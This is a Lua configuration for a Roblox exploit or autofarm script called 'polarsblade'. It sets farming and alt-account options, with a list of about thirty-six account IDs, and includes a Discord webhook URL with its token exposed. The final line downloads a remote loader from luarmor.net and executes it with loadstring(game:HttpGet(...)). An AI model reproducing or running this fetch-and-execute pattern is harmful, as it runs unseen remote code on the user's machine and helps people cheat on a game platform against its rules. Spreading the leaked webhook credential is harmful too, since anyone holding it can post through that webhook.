script_key=""

_G.polarsblade = {
    client = {
        fps = 8,
        rendering = true,
        gui = false,
    },
    items = {
        mask = true,
        unjail = true,
    },
    server = {
        handlekicks = false,
        serverhoponknock = false,
        serverhoponnoregisters = false,
        
        otheraccounts = {
            switch = true,
            ids = {
                3719095974,
                3719094992,
                3719087676,
                3717990516,
                3719084596,
                3718061120,
                3718045446,
                3718041567,
                3718028682,
                3718039351,
                3718019947,
                3718031255,
                3718058329,
                3718049045,
                5546189243,
                5546186270,
                5543199906,
                5543199028,
                5543198096,
                5543197018,
                5543195923,
                5546452417,
                5546439828,
                5546398854,
                5546369864,
                5546367498,
                5546352150,
                5546339603,
                5546334684,
                5546331162,
                5546327559,
                3717992314,
                3718046979,
                502075313,
                5706055006,
                5710261741,
            }
        }
    },
    otherfarmers = {
        killfarmers = false,
        jumpatms = false,
    },
    webhook = {
        switch = true,
        link = "https://discord.com/api/webhooks/1277079535057109137/_5Olw3rtMa60TF1BNDq1XqTScni5kB3-Fmezm63mCJZh32gioVwhUe-7Qs1_AYbtO8CB",
    },
}

loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/dcba12602570f5a1c36c86252d5f78c9.lua"))()
